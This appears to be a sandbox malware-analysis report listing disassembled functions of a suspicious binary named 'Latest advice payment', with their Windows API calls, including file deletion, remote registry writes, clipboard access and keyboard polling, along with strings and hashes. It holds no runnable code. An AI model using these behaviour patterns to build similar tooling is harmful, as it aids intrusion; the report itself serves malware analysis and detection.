                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                            • String ID: $default$winsta0
                                                            • API String ID: 2063423040-1027155976
                                                            • Opcode ID: aaaa9a9f53312067f7715e3c07fb0c99788cf726e9207d62e620e9dccf2c68c1
                                                            • Instruction ID: 3f98d7a1fcd5d9cca431927ef572f39aa73d969373900d20b7539ab1791c1e2a
                                                            • Opcode Fuzzy Hash: aaaa9a9f53312067f7715e3c07fb0c99788cf726e9207d62e620e9dccf2c68c1
                                                            • Instruction Fuzzy Hash: D0813771900249BBDF219FA4CC49AFE7FBDBF04304F145169F950A62A1DB31AA14DB60
                                                            Function 005CC75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 005CC78D
                                                            • FindClose.KERNEL32(00000000), ref: 005CC7E1
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 005CC806
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 005CC81D
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 005CC844
                                                            • __swprintf.LIBCMT ref: 005CC890
                                                            • __swprintf.LIBCMT ref: 005CC8D3
                                                              • Part of subcall function 00567DE1: _memmove.LIBCMT ref: 00567E22
                                                            • __swprintf.LIBCMT ref: 005CC927
                                                              • Part of subcall function 00583698: __woutput_l.LIBCMT ref: 005836F1
                                                            • __swprintf.LIBCMT ref: 005CC975
                                                              • Part of subcall function 00583698: __flsbuf.LIBCMT ref: 00583713
                                                              • Part of subcall function 00583698: __flsbuf.LIBCMT ref: 0058372B
                                                            • __swprintf.LIBCMT ref: 005CC9C4
                                                            • __swprintf.LIBCMT ref: 005CCA13
                                                            • __swprintf.LIBCMT ref: 005CCA62
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                            • API String ID: 3953360268-2428617273
                                                            • Opcode ID: b06eb37703ce33349938516f3fd9855fa938acd943c26915bc17a44dbf37c6c9
                                                            • Instruction ID: 47a2a09a8a7f0d5bb6af897f9a3291b54a06fd98281a59b985b1f36cec7b3fc4
                                                            • Opcode Fuzzy Hash: b06eb37703ce33349938516f3fd9855fa938acd943c26915bc17a44dbf37c6c9
                                                            • Instruction Fuzzy Hash: BEA10BB1408246ABC754EFA4C989DAFBBECBFD8704F40091DF59587191EA35DA08CB62
                                                            Function 005CEF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 005CEFB6
                                                            • _wcscmp.LIBCMT ref: 005CEFCB
                                                            • _wcscmp.LIBCMT ref: 005CEFE2
                                                            • GetFileAttributesW.KERNEL32(?), ref: 005CEFF4
                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 005CF00E
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 005CF026
                                                            • FindClose.KERNEL32(00000000), ref: 005CF031
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 005CF04D
                                                            • _wcscmp.LIBCMT ref: 005CF074
                                                            • _wcscmp.LIBCMT ref: 005CF08B
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 005CF09D
                                                            • SetCurrentDirectoryW.KERNEL32(00618920), ref: 005CF0BB
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 005CF0C5
                                                            • FindClose.KERNEL32(00000000), ref: 005CF0D2
                                                            • FindClose.KERNEL32(00000000), ref: 005CF0E4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                            • String ID: *.*
                                                            • API String ID: 1803514871-438819550
                                                            • Opcode ID: 57326fc3a68504115172f42fb4cb20ce33553ed9e12982d0d5e09f6dc6f190ea
                                                            • Instruction ID: 826723a640709bbe3feec7226bb10cdfb6b4a7e6739d0370fa1026f09091e049
                                                            • Opcode Fuzzy Hash: 57326fc3a68504115172f42fb4cb20ce33553ed9e12982d0d5e09f6dc6f190ea
                                                            • Instruction Fuzzy Hash: 7531D2365002496ECB14ABA4DC8DFEE7BAEAF48720F1441B9E841E2091DF70DA84DB51
                                                            Function 005E0857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005E0953
                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,005EF910,00000000,?,00000000,?,?), ref: 005E09C1
                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 005E0A09
                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 005E0A92
                                                            • RegCloseKey.ADVAPI32(?), ref: 005E0DB2
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 005E0DBF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Close$ConnectCreateRegistryValue
                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                            • API String ID: 536824911-966354055
                                                            • Opcode ID: ab9b03e903a0e9e3680966e8e4643689c3a75565cf6e01622bab920c416c0762
                                                            • Instruction ID: 34aabd6f6dedb26bed29122602a7f1af4a4d0da7cdf3de8f21101588f365675f
                                                            • Opcode Fuzzy Hash: ab9b03e903a0e9e3680966e8e4643689c3a75565cf6e01622bab920c416c0762
                                                            • Instruction Fuzzy Hash: 30026E756046529FCB14EF15C895E2ABBE5FF89320F04885CF8999B3A2DB70EC45CB81
                                                            Function 005766E1 Relevance: 25.9, Strings: 20, Instructions: 889COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 0D`$0E`$0F`$3cW$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pG`$_W
                                                            • API String ID: 0-815455075
                                                            • Opcode ID: f31915f37f17f1e5bb77c2e6f17d9fabaeed2183cecd6f0faee5a1e744f350ac
                                                            • Instruction ID: 2753d9b82f55221733ac00335448eadc68af97f7ca5f4ec0f3a6298d1768abfb
                                                            • Opcode Fuzzy Hash: f31915f37f17f1e5bb77c2e6f17d9fabaeed2183cecd6f0faee5a1e744f350ac
                                                            • Instruction Fuzzy Hash: BB728F75E00A19CBDB24CF59D8907EEBBB5FF44310F54856AE809EB280EB309D81DB94
                                                            Function 005CF0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 005CF113
                                                            • _wcscmp.LIBCMT ref: 005CF128
                                                            • _wcscmp.LIBCMT ref: 005CF13F
                                                              • Part of subcall function 005C4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 005C43A0
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 005CF16E
                                                            • FindClose.KERNEL32(00000000), ref: 005CF179
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 005CF195
                                                            • _wcscmp.LIBCMT ref: 005CF1BC
                                                            • _wcscmp.LIBCMT ref: 005CF1D3
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 005CF1E5
                                                            • SetCurrentDirectoryW.KERNEL32(00618920), ref: 005CF203
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 005CF20D
                                                            • FindClose.KERNEL32(00000000), ref: 005CF21A
                                                            • FindClose.KERNEL32(00000000), ref: 005CF22C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                            • String ID: *.*
                                                            • API String ID: 1824444939-438819550
                                                            • Opcode ID: 53e6c39d8b3aa7f5db75f9a123ee782aa4c4e7baf505154190cbc3c855a26ad8
                                                            • Instruction ID: f702a6816bb69d4f36be863784ea7bd1c71a11f63175d8e74b4f4d1ba32dcff3
                                                            • Opcode Fuzzy Hash: 53e6c39d8b3aa7f5db75f9a123ee782aa4c4e7baf505154190cbc3c855a26ad8
                                                            • Instruction Fuzzy Hash: A031D53A50025A6ECB14AFA4EC59FEE7BAEAF85360F140179E840A7090DB30DE45DB54
                                                            Function 005CA1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 005CA20F
                                                            • __swprintf.LIBCMT ref: 005CA231
                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 005CA26E
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 005CA293
                                                            • _memset.LIBCMT ref: 005CA2B2
                                                            • _wcsncpy.LIBCMT ref: 005CA2EE
                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 005CA323
                                                            • CloseHandle.KERNEL32(00000000), ref: 005CA32E
                                                            • RemoveDirectoryW.KERNEL32(?), ref: 005CA337
                                                            • CloseHandle.KERNEL32(00000000), ref: 005CA341
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                            • String ID: :$\$\??\%s
                                                            • API String ID: 2733774712-3457252023
                                                            • Opcode ID: 060728e2275daa43f96aea57608a9133e202af3d8455db6faa664141ae49d1e1
                                                            • Instruction ID: f846833ed2eca7392855dfe2df331aba77c348aa8172cc006601b135b8f283e3
                                                            • Opcode Fuzzy Hash: 060728e2275daa43f96aea57608a9133e202af3d8455db6faa664141ae49d1e1
                                                            • Instruction Fuzzy Hash: 5E31A27590415AABDB219FA0DC89FEB3BBCFF88705F1040B9F948D6150EB7096448B25
                                                            Function 005C001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 005C0097
                                                            • SetKeyboardState.USER32(?), ref: 005C0102
                                                            • GetAsyncKeyState.USER32(000000A0), ref: 005C0122
                                                            • GetKeyState.USER32(000000A0), ref: 005C0139
                                                            • GetAsyncKeyState.USER32(000000A1), ref: 005C0168
                                                            • GetKeyState.USER32(000000A1), ref: 005C0179
                                                            • GetAsyncKeyState.USER32(00000011), ref: 005C01A5
                                                            • GetKeyState.USER32(00000011), ref: 005C01B3
                                                            • GetAsyncKeyState.USER32(00000012), ref: 005C01DC
                                                            • GetKeyState.USER32(00000012), ref: 005C01EA
                                                            • GetAsyncKeyState.USER32(0000005B), ref: 005C0213
                                                            • GetKeyState.USER32(0000005B), ref: 005C0221
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            • Opcode ID: 327e6b4ced5e26718c30bdf3bd451b4514c7fb74cfd273c4cb4c04c838a358c6
                                                            • Instruction ID: 305b3dc3aa7bac51704db24498633bb65c2b0299f123dd26790a0b43ce00ca8d
                                                            • Opcode Fuzzy Hash: 327e6b4ced5e26718c30bdf3bd451b4514c7fb74cfd273c4cb4c04c838a358c6
                                                            • Instruction Fuzzy Hash: DF51FB209047C8ADFB35DBE08858FEAFFB4AF11780F48559E85C2561C3DAA49B8CC761
                                                            Function 005E03DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 005E0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,005DFDAD,?,?), ref: 005E0E31
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005E04AC
                                                              • Part of subcall function 00569837: __itow.LIBCMT ref: 00569862
                                                              • Part of subcall function 00569837: __swprintf.LIBCMT ref: 005698AC
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 005E054B
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 005E05E3
                                                            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 005E0822
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 005E082F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 1240663315-0
                                                            • Opcode ID: ac4e3d02d07e57778d794b630a5e4bc5aa3deaaf65354343762374b5b1cb3807
                                                            • Instruction ID: 35cc10cd866bb3168027cabcba9e7d609f524e50d27bd7b9627d86fdd1d4de4d
                                                            • Opcode Fuzzy Hash: ac4e3d02d07e57778d794b630a5e4bc5aa3deaaf65354343762374b5b1cb3807
                                                            • Instruction Fuzzy Hash: 7AE15071204245AFCB14DF25C895E2ABBE8FF89314F04896DF48ADB2A1DA70ED45CB91
                                                            Function 005D4164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                            • String ID:
                                                            • API String ID: 1737998785-0
                                                            • Opcode ID: e79b337fad73a75f8756055d0b165a4c1ca49d61e7ad3ae2eb6ce60a00604d10
                                                            • Instruction ID: 52e994ca329fbf320ee332959539c773a6b0a4b32aa9510ba339e13ed8526115
                                                            • Opcode Fuzzy Hash: e79b337fad73a75f8756055d0b165a4c1ca49d61e7ad3ae2eb6ce60a00604d10
                                                            • Instruction Fuzzy Hash: DF21AD752012119FDB24AF64DC49B697FA8FF64310F00802AF986DB2A1CB30A901DB84
                                                            Function 005C37EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00564750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00564743,?,?,005637AE,?), ref: 00564770
                                                              • Part of subcall function 005C4A31: GetFileAttributesW.KERNEL32(?,005C370B), ref: 005C4A32
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 005C38A3
                                                            • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 005C394B
                                                            • MoveFileW.KERNEL32(?,?), ref: 005C395E
                                                            • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 005C397B
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 005C399D
                                                            • FindClose.KERNEL32(00000000,?,?,?,?), ref: 005C39B9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                            • String ID: \*.*
                                                            • API String ID: 4002782344-1173974218
                                                            • Opcode ID: 35dd2cbaa7190d808ee6f2488cc0e226919cdea25d537b1b9fd87455de6729de
                                                            • Instruction ID: ed8259485f823d2ea740df6691a3fd6cc7aa6dfb4832db6cd5b6924852483739
                                                            • Opcode Fuzzy Hash: 35dd2cbaa7190d808ee6f2488cc0e226919cdea25d537b1b9fd87455de6729de
                                                            • Instruction Fuzzy Hash: 5A516A3180514EAECB05EBE0D996EEDBB79BF64304F608069E446771A1EF316F09CB61
                                                            Function 005CF3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00567DE1: _memmove.LIBCMT ref: 00567E22
                                                            • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 005CF440
                                                            • Sleep.KERNEL32(0000000A), ref: 005CF470
                                                            • _wcscmp.LIBCMT ref: 005CF484
                                                            • _wcscmp.LIBCMT ref: 005CF49F
                                                            • FindNextFileW.KERNEL32(?,?), ref: 005CF53D
                                                            • FindClose.KERNEL32(00000000), ref: 005CF553
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                            • String ID: *.*
                                                            • API String ID: 713712311-438819550
                                                            • Opcode ID: ada3be673e61b883fcdd2c127b070f7328d09c17aedf7dc9aa284202d78c6f1b
                                                            • Instruction ID: 4ac4b499e738f359d6112d9a2c0c118b7a2907d9c2d385bf2ca9e597fd977e94
                                                            • Opcode Fuzzy Hash: ada3be673e61b883fcdd2c127b070f7328d09c17aedf7dc9aa284202d78c6f1b
                                                            • Instruction Fuzzy Hash: 64415A7190024AAFCF14DFA4DC89BEEBFB5FF45310F14446AE955A7190EB309A88CB50
                                                            Function 00573030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: __itow__swprintf
                                                            • String ID: 3cW$_W
                                                            • API String ID: 674341424-1067530677
                                                            • Opcode ID: 51422983c3ca322f15aa4aa27cc63cca3337ea1d37c10eca4ccdb9066fed04f2
                                                            • Instruction ID: f63d161dfd93cb02b9e5f9fb03bd17d05e76003bf3623841b71e5c946bf5cd40
                                                            • Opcode Fuzzy Hash: 51422983c3ca322f15aa4aa27cc63cca3337ea1d37c10eca4ccdb9066fed04f2
                                                            • Instruction Fuzzy Hash: 18228B716083019FCB24DF14D895B6EBBE9BFC5720F04891CF89A97291DB71E904DB92
                                                            Function 00575760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 7461842e429de19e548c23c1c200ded759b8fee900d23a915d9e7bc6bf95dbd6
                                                            • Instruction ID: 1c429f6b8cb1e0c703086f8957a9c26fb757c4e14cbfbddc2cb9f8c3b26a3839
                                                            • Opcode Fuzzy Hash: 7461842e429de19e548c23c1c200ded759b8fee900d23a915d9e7bc6bf95dbd6
                                                            • Instruction Fuzzy Hash: 8612A070A0060ADFDF14DFA4D985AEEBBF5FF88310F108529E44AE7290EB35A914DB50
                                                            Function 005C3B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                            Download Yara Rule
                                                            APIs
